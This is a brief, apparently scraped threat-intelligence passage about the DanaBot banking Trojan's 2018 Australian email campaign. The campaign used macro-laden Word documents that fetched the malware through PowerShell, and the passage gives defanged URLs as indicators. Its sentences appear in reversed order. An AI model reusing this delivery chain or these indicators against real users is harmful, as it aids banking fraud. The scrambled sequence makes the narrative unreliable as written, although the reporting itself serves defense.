This payload was only served to potential victims in AU, with the server checking the client’s IP geolocation. The Word document contained a macro that, if enabled, downloaded DanaBot using a PowerShell command from hxxp://bbclumpensorg/tXBDQjBLvs.php. The messages used the subject "Your E-Toll account statement" and contained URLs redirecting to Microsoft Word documents hosted on another site (hxxp://userstpgcomau/angelcorp2001/Account+Statement_Mon752018.doc).įigure 1: Sample email from a May 6, 2018, DanaBot campaign We first observed DanaBot as the payload of an Australia-targeted email campaign on May 6, 2018. We also found additional samples in malware repositories other than those we observed in the wild, potentially suggesting distribution by other actors. However, it remains to be seen if distribution and use becomes more widespread given that the actor is known for purchasing banking Trojans from other developers and operators. To date, we have only observed it being spread by a single threat actor. Written in Delphi, the malware is still under active development. Proofpoint researchers discovered a new banking Trojan, dubbed “DanaBot”, targeting users in Australia via emails containing malicious URLs. Now a new banking Trojan has emerged, adding to the growing diversity of this segment specifically and malicious email campaigns in general. Banking Trojans now make up almost 60% of malicious payloads we observe in email. 2018 has seen a marked shift away from high-volume, immediately destructive ransomware campaigns to distribution of banking Trojans, information stealers, and downloaders.
0 kommentar(er)
